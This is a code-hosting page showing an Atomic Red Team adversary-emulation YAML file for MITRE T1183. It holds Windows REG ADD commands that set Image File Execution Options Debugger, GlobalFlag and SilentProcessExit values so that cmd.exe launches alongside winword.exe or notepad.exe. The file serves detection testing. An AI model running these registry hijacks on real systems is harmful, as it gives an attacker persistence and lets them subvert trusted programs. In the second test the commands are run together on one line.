security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
fc495c1192fda69bd1ed33a13d7590ef055eee09
atomic-red-team/atomics/T1183/T1183.yaml
T
caseysmithrc 515da8e9dc yamilze
2018-05-24 07:59:56 -06:00

48 lines
1.4 KiB
YAML
Raw Blame History

---
attack_technique: T1183
display_name: Image File Execution Options
atomic_tests:
- name: IFEO Add Debugger
description: |
TODO
supported_platforms:
- windows
input_arguments:
target_binary:
description: Binary To Attach To
type: Path
default: winword.exe
payload_binary:
description: Binary To Execute
type: Path
default: cmd.exe
executor:
name: command_prompt
command: |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
- name: IFEO GLobal Flags
description: |
Leverage Global Flags Settings
supported_platforms:
- windows
input_arguments:
target_binary:
description: Binary To Attach To
type: Path
default: notepad.exe
payload_binary:
description: Binary To Execute
type: Path
default: cmd.exe
executor:
name: command_prompt
command: |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}"
Reference in New Issue View Git Blame Copy Permalink